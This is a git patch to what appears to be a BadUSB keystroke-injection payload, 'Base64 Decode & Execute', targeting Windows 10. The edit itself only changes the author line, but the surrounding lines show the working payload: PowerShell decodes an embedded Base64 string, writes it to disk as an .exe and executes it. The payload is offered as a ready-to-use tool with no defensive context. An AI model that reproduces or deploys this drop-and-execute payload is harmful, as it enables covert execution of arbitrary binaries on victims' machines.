From 4adb5c92f3f3c92819f237655e096e555acc5d13 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 10 May 2023 12:59:14 +0000 Subject: [PATCH] Update Base64 Decode & Execute.txt --- Tools/Base64 Decode & Execute.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Tools/Base64 Decode & Execute.txt b/Tools/Base64 Decode & Execute.txt index 8bef849..b63056c 100644 --- a/Tools/Base64 Decode & Execute.txt +++ b/Tools/Base64 Decode & Execute.txt @@ -1,5 +1,5 @@ REM Title: Base64 Decode & Execute -REM Author: @beigeworm +REM Author: @beigeworm | https://github.com/beigeworm REM Description: Uses Powershell to decode a Base64 string and then execute the file. REM Target: Windows 10 @@ -27,4 +27,4 @@ STRING $decodedFile = [System.Convert]::FromBase64String($b64); REM *replace NAME_HERE and desired filetype (example is .exe)* STRING $File = "NAME_HERE"+".exe"; -STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File \ No newline at end of file +STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File